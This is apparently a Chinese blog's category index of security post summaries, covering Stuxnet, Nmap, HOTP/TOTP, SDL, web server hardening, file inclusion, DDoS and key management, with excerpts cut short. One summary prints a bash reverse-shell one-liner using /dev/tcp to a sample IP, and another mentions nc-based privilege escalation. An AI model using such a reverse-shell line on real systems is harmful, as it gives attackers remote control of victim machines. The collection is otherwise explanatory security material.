随笔分类 - InternetSecurity
互联网安全
摘要:原文链接:https://security.tencent.com/index.php/blog/msg/21 一、前言 伊朗2010年被报出核工厂遭受“超级工厂”(Stuxnet)病毒攻击,蠕虫通过多个漏洞潜伏在工控系统近两年未被发现。相信诸如上述案例中的伊朗核工厂,大多网络中都会部署有各种形形色
阅读全文
摘要:Nmap 是一款网络扫描和主机检测的工具。 Nmap 的功能不局限于收集信息和枚举,同时可以用来作为一个漏洞探测器或安全扫描器。 Nmap 适用于 Winodws、Linux、Mac 等操作系统。Nmap 可用于: 检测活在网络上的主机(主机发现)检测主机上开放的端口(端口发现或枚举)检测到相应的端
阅读全文
摘要:【原文链接】https://www.lovesec.com/penetration-test/233.html 1 验证码不失效 造成原因:找回密码的时候获取的验 证码缺少时间限制仅值判断了验证码是够正确未判断验证码是否过期 测试方法:通过枚举找到真正的验证 码输入验证码完成验证-案例输入目标手机号
阅读全文
摘要:思睿嘉得 DLP:http://www.cirrusgate.com/ 杀毒软件/个人终端防护:赛门铁克 商业防火墙:山石 HillStone 轻量级JAVA实时业务风控系统框架:https://github.com/sunpeak/riskcontrol
阅读全文
摘要:密码/HashCode 破解网站:https://www.onlinehashcrack.com/hash-cracking.php 漏洞库:https://www.exploit-db.com/ Linux 漏洞库:https://www.exploit-db.com/exploits/15285
阅读全文
摘要:原文链接:https://www.cnblogs.com/hanxiaobei/p/5603629.html 本文将从最开始的信息收集开始讲述是如何一步步的攻破你的网站和服务器的.阅读本文你会学到以下内容: 1.渗透测试前的简单信息收集 2.sqlmap的使用 3.nmap的使用 4.nc反弹提权
阅读全文
摘要:原文链接:https://blog.csdn.net/LVXIANGAN/article/details/73775969 网银动态口令工作原理是什么? 当你使用网银时,网站要求提供六位数动态口令。那么网站是如何验证这六位数是不是正确的呢?验证原理是什么? 当你使用网银时,网站要求提供六位数动态口令
阅读全文
摘要:HOTP:An HMAC-Based One-Time Password Algorithm(基于哈希运算消息认证码的一次性口令) HMAC:Hashed Message Authentication Code 技术标准:https://tools.ietf.org/html/rfc4226
阅读全文
摘要:TOTP:Time-Based One-Time Password Algorithm,基于时间同步的一次性口令,动态口令 技术标准:https://tools.ietf.org/html/rfc6238 参考链接: https://blog.csdn.net/LVXIANGAN/article/d
阅读全文
摘要:1.Bash: bash–i >&/dev/tcp/10.0.0.1/80800>&1 //bash –i打开一个交互的bash, /dev/tcp建立一个socket连接, >&将标准错误输出重定向到标准输出中,0>&1将标准输入重定向到标准输出中。 Linux shell文件描述符: 1.标准输
阅读全文
摘要:参考链接:http://blog.chinaunix.net/uid-26495963-id-3150576.html UUID是什么? UUID(Universally Unique Identifier)全局唯一标识符,是指在一台机器上生成的数字,它保证对在同一时空中的所有机器都是唯一的。按照开
阅读全文
摘要:安全运营 —— 贯穿产品研发、业务运行、漏洞修复等一系列环节,实行系统的管理方法和流程,将各个环节的安全防控作用有机结合,保障整个业务的安全性。 Secure at the Source → Find and Fix & Defend and Defer 1、Secure at the Source
阅读全文
摘要:SDL:Security Development Lifecycle 安全开发生命周期 确定安全要求 创建质量门/错误标尺 安全和隐私风险评估 确定设计要求 分析攻击面 威胁建模 使用批准的工具 弃用不安全的函数 静态分析 动态分析 模糊测试 攻击面评析 事件响应计划 最终安全评析 发布存档 1、培
阅读全文
摘要:安全是产品的一个特性,当一个产品其他方面都做得很好的时候,安全可能成为产品的核心竞争力。例如搜索引擎,电子邮箱。 好的安全方案:可以有效地解决问题、良好的用户体验、优秀的性能。例如:复杂密码(对抗暴力破解、防止密码中包含个人信息) 业务逻辑安全:业务逻辑问题是一种设计缺陷,在产品开发过程中,可以考虑
阅读全文
摘要:一、让工程师写出的每一行代码都是安全的 SDL 二、让所有已知的、未知的攻击,都能在第一时间发现,并迅速报警和追踪 IDS、IPS、蜜罐 三、让安全成为公司的核心竞争力,深入到每一个产品的特性中,能够更好地引导用户使用互联网的习惯 四、能够观测到整个互联网安全趋势的变化,对未来一段时间内的风险做出预
阅读全文
摘要:常见 Web Server:Apache Httpd、Nginx、LightHttp。Web Server 安全:自身是否安全 + 是否提供了可用的安全功能。 Apache 安全 Apache 的漏洞大多是 Apache 的 module 造成,其核心高危漏洞几乎没有。默认启动的 Module 出现
阅读全文
摘要:文件包含漏洞 文件包含漏洞可能出现在 JSP、PHP、ASP 等语言中,常90见的导致文件包含的函数: PHP:include(),include_once(),require(),require_once(),fopen(),readfile(),... JSP/Servlet:ava.io.Fi
阅读全文
摘要:DOS:Denial Of Service DDOS:Distributed Denial Of Service(利用僵尸网络——由“肉鸡”组成,发起 DoS 攻击) 常见的 DDOS 攻击 SYN flood(经典,利用了 TCP 协议“三次握手”设计中的缺陷),UDP flood,ICMP fl
阅读全文
摘要:Web 应用开发框架,统一设计,便于安全防控。 常用 Web 框架:MVC —— Model(数据处理)-View(与用户交互)-Controller(控制应用逻辑),例如 Spring 不同层级对应的 Web 安全 View 视图层:XSS Controller 控制层:CSRF、访问控制、认证、
阅读全文
摘要:使用安全可靠的加密算法和随机数生成算法 密钥管理 在密码学里有个基本原则:密码系统的安全性应该依赖于密钥的复杂性,而不是算法的保密性。 在安全领域里,选择一个足够安全的加密算法不是困难的事,难的是密钥管理。在密钥管理中常见的错误是,将密钥硬编码在代码里。硬编码的密钥容易泄露: ① 代码被广泛传播(开
阅读全文